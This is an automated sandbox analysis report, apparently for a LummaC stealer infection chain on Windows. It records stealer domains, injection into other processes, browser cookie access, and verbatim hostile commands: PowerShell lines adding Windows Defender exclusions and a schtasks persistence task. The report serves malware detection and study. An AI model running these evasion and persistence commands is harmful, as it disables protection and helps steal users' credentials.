                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6BF8AC62
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeMemory protected: page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Yara detected Powershell download and execute
                              Source: Yara matchFile source: Process Memory Space: 3m20j.exe PID: 5932, type: MEMORYSTR
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Injects a PE file into a foreign processes
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMemory written: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe base: 400000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeMemory written: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe base: 400000 value starts with: 4D5A
                              LummaC encrypted strings found
                              Source: 2i7672.exeString found in binary or memory: rapeflowwj.lat
                              Source: 2i7672.exeString found in binary or memory: sustainskelet.lat
                              Source: 2i7672.exeString found in binary or memory: crosshuaht.lat
                              Source: 2i7672.exeString found in binary or memory: energyaffai.lat
                              Source: 2i7672.exeString found in binary or memory: aspecteirs.lat
                              Source: 2i7672.exeString found in binary or memory: discokeyus.lat
                              Source: 2i7672.exeString found in binary or memory: necklacebudi.lat
                              Source: 2i7672.exeString found in binary or memory: sweepyribs.lat
                              Source: 2i7672.exeString found in binary or memory: grannyejh.lat
                              Source: 5813f66ed1.exe, 0000000C.00000002.2289915606.00000000006B1000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: cheapptaxysu.click
                              Writes to foreign memory regions
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Windows\System32\mode.com base: 2CB4EB20000
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Windows\System32\mode.com base: F0C543E2D8
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 1A3A3870000
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 29DC4A62D8
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 1A065D70000
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 8907B282D8
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 1F3C6080000
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 33C21E52D8
                              Source: C:\Windows\System32\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\main\7z.exe base: 29219440000
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe "C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe "C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe "C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HIDGCFBFBF.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe "C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HIDGCFBFBF.exe "C:\Users\user\Documents\HIDGCFBFBF.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,10_2_6BFD4760
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00DF17EE
                              Source: 3m20j.exe, 3m20j.exe, 0000000A.00000002.2489505267.00000000010BB000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: 8YProgram Manager
                              Source: 5813f66ed1.exe, 0000000C.00000002.2290019046.000000000088F000.00000040.00000001.01000000.0000000E.sdmp, ae64e67a81.exe, 00000013.00000002.2385447812.0000000000224000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Program Manager
                              Source: 2i7672.exe, 2i7672.exe, 00000005.00000002.1962161432.0000000000C80000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: B]FProgram Manager
                              Source: 1I15f6.exe, 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: oProgram Manager
                              Source: 2i7672.exe, 00000005.00000002.1962161432.0000000000C80000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: B]FProgram ManagerPdCu
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF8AE71 cpuid 10_2_6BF8AE71
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
